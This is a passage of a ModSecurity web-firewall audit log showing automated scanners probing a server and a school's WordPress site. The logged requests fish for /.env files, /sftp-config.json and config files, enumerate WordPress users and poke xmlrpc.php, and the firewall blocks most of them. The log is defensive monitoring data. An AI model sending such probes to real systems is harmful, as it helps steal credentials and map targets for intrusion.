Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745483726857313 757 (- - -)
Stopwatch2: 1745483726857313 757; combined=296, p1=261, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--19a19f3d-Z--
--afb5f76c-A--
[24/Apr/2025:15:52:43 +0700] aAn722Luk3f9kLjsdTbxuAAAAJY 103.236.140.4 51224 103.236.140.4 8181
--afb5f76c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 178.128.207.219
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 178.128.207.219
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--afb5f76c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--afb5f76c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745484763587154 739 (- - -)
Stopwatch2: 1745484763587154 739; combined=311, p1=275, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--afb5f76c-Z--
--2245a31d-A--
[24/Apr/2025:16:53:11 +0700] aAoKB95yz20UX9VrdZM6PQAAAE0 103.236.140.4 37502 103.236.140.4 8181
--2245a31d-B--
GET /.env.production.local HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.42
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.42
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--2245a31d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2245a31d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745488391681197 807 (- - -)
Stopwatch2: 1745488391681197 807; combined=345, p1=302, p2=0, p3=0, p4=0, p5=42, sr=75, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2245a31d-Z--
--867b0d7c-A--
[24/Apr/2025:16:53:13 +0700] aAoKCfiVYlyO1xhz7yMZJwAAAMg 103.236.140.4 37508 103.236.140.4 8181
--867b0d7c-B--
GET /.env_sample HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.42
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.42
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--867b0d7c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--867b0d7c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745488393085453 730 (- - -)
Stopwatch2: 1745488393085453 730; combined=338, p1=301, p2=0, p3=0, p4=0, p5=37, sr=117, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--867b0d7c-Z--
--6216ab65-A--
[24/Apr/2025:16:53:14 +0700] aAoKCviVYlyO1xhz7yMZKQAAAMs 103.236.140.4 37514 103.236.140.4 8181
--6216ab65-B--
GET /.env.dev HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.42
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.42
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--6216ab65-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6216ab65-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745488394461378 759 (- - -)
Stopwatch2: 1745488394461378 759; combined=298, p1=263, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6216ab65-Z--
--164ca932-A--
[24/Apr/2025:16:53:15 +0700] aAoKC95yz20UX9VrdZM6PgAAAFM 103.236.140.4 37520 103.236.140.4 8181
--164ca932-B--
GET /.env.dist HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.42
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.42
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--164ca932-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--164ca932-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745488395163267 653 (- - -)
Stopwatch2: 1745488395163267 653; combined=261, p1=228, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--164ca932-Z--
--b7b40c6d-A--
[24/Apr/2025:16:53:15 +0700] aAoKC_iVYlyO1xhz7yMZLAAAAMQ 103.236.140.4 37526 103.236.140.4 8181
--b7b40c6d-B--
GET /.env.preprod HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.42
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.42
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--b7b40c6d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b7b40c6d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745488395842488 612 (- - -)
Stopwatch2: 1745488395842488 612; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b7b40c6d-Z--
--36c4ba5a-A--
[24/Apr/2025:16:53:16 +0700] aAoKDN5yz20UX9VrdZM6PwAAAFc 103.236.140.4 37528 103.236.140.4 8181
--36c4ba5a-B--
GET /.env.development.local HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.42
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.42
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--36c4ba5a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--36c4ba5a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745488396520179 799 (- - -)
Stopwatch2: 1745488396520179 799; combined=345, p1=305, p2=0, p3=0, p4=0, p5=39, sr=76, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--36c4ba5a-Z--
--2c281e08-A--
[24/Apr/2025:16:53:17 +0700] aAoKDfiVYlyO1xhz7yMZLQAAAM4 103.236.140.4 37530 103.236.140.4 8181
--2c281e08-B--
GET /.env.secret HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.42
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.42
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--2c281e08-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2c281e08-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745488397193929 702 (- - -)
Stopwatch2: 1745488397193929 702; combined=259, p1=226, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2c281e08-Z--
--a0215d57-A--
[24/Apr/2025:16:53:17 +0700] aAoKDfiVYlyO1xhz7yMZLwAAANE 103.236.140.4 37536 103.236.140.4 8181
--a0215d57-B--
GET /.env.staging.local HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.42
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.42
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--a0215d57-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a0215d57-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745488397876388 774 (- - -)
Stopwatch2: 1745488397876388 774; combined=332, p1=298, p2=0, p3=0, p4=0, p5=34, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a0215d57-Z--
--5dc3ec15-A--
[24/Apr/2025:16:53:19 +0700] aAoKD95yz20UX9VrdZM6QQAAAEI 103.236.140.4 37542 103.236.140.4 8181
--5dc3ec15-B--
GET /configuration/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.42
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.42
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--5dc3ec15-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5dc3ec15-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745488399245507 681 (- - -)
Stopwatch2: 1745488399245507 681; combined=285, p1=249, p2=0, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5dc3ec15-Z--
--8b79af03-A--
[24/Apr/2025:16:53:20 +0700] aAoKEPiVYlyO1xhz7yMZMQAAANI 103.236.140.4 37552 103.236.140.4 8181
--8b79af03-B--
GET /.env.config HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.42
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.42
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--8b79af03-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8b79af03-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745488400607016 838 (- - -)
Stopwatch2: 1745488400607016 838; combined=404, p1=370, p2=0, p3=0, p4=0, p5=34, sr=171, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8b79af03-Z--
--b1c2900a-A--
[24/Apr/2025:17:37:30 +0700] aAoUaslQo524fhbIj1zlvQAAABE 103.236.140.4 47912 103.236.140.4 8181
--b1c2900a-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.108.86
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.108.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--b1c2900a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b1c2900a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745491050743583 2526 (- - -)
Stopwatch2: 1745491050743583 2526; combined=1289, p1=410, p2=848, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b1c2900a-Z--
--837c143b-A--
[24/Apr/2025:17:37:38 +0700] aAoUcslQo524fhbIj1zlwAAAAAE 103.236.140.4 47948 103.236.140.4 8181
--837c143b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.108.86
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.108.86
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--837c143b-C--
demo.sayHello
--837c143b-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--837c143b-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745491058026213 7015 (- - -)
Stopwatch2: 1745491058026213 7015; combined=4948, p1=618, p2=4076, p3=38, p4=42, p5=102, sr=77, sw=72, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--837c143b-Z--
--45003f76-A--
[24/Apr/2025:17:48:31 +0700] aAoW_95yz20UX9VrdZM-NgAAAFE 103.236.140.4 50628 103.236.140.4 8181
--45003f76-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 64.227.32.66
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 64.227.32.66
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--45003f76-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--45003f76-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745491711682551 824 (- - -)
Stopwatch2: 1745491711682551 824; combined=346, p1=308, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--45003f76-Z--
--ab0b8403-A--
[24/Apr/2025:17:57:09 +0700] aAoZBWLuk3f9kLjsdTb5AQAAAIc 103.236.140.4 52676 103.236.140.4 8181
--ab0b8403-B--
GET /sftp-config.json HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 46.250.232.244
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 46.250.232.244
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: */*
--ab0b8403-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ab0b8403-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745492229980302 830 (- - -)
Stopwatch2: 1745492229980302 830; combined=317, p1=283, p2=0, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ab0b8403-Z--
--49678838-A--
[24/Apr/2025:18:24:42 +0700] aAofeslQo524fhbIj1zocQAAABg 103.236.140.4 59198 103.236.140.4 8181
--49678838-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Accept-Charset: utf-8
--49678838-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--49678838-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745493882785810 808 (- - -)
Stopwatch2: 1745493882785810 808; combined=299, p1=261, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--49678838-Z--
--a07f2579-A--
[24/Apr/2025:18:57:59 +0700] aAonR8lQo524fhbIj1zqHgAAAAA 103.236.140.4 38802 103.236.140.4 8181
--a07f2579-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 154.213.199.185
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.213.199.185
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--a07f2579-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a07f2579-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745495879675682 3254 (- - -)
Stopwatch2: 1745495879675682 3254; combined=1436, p1=498, p2=907, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a07f2579-Z--
--c5e14e00-A--
[24/Apr/2025:18:58:26 +0700] aAonYslQo524fhbIj1zqPAAAABY 103.236.140.4 39116 103.236.140.4 8181
--c5e14e00-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 154.213.199.185
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.213.199.185
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--c5e14e00-C--
demo.sayHello
--c5e14e00-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c5e14e00-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745495906874384 5758 (- - -)
Stopwatch2: 1745495906874384 5758; combined=4288, p1=584, p2=3471, p3=31, p4=35, p5=98, sr=118, sw=69, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c5e14e00-Z--
--7df56e7f-A--
[24/Apr/2025:19:18:14 +0700] aAosBmLuk3f9kLjsdTb_TgAAAIk 103.236.140.4 46632 103.236.140.4 8181
--7df56e7f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.80.2
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.80.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36
Accept-Charset: utf-8
--7df56e7f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7df56e7f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745497094553952 894 (- - -)
Stopwatch2: 1745497094553952 894; combined=405, p1=354, p2=0, p3=0, p4=0, p5=51, sr=153, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7df56e7f-Z--
--904dab34-A--
[24/Apr/2025:19:59:24 +0700] aAo1rGLuk3f9kLjsdTYClwAAAIU 103.236.140.4 35648 103.236.140.4 8181
--904dab34-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
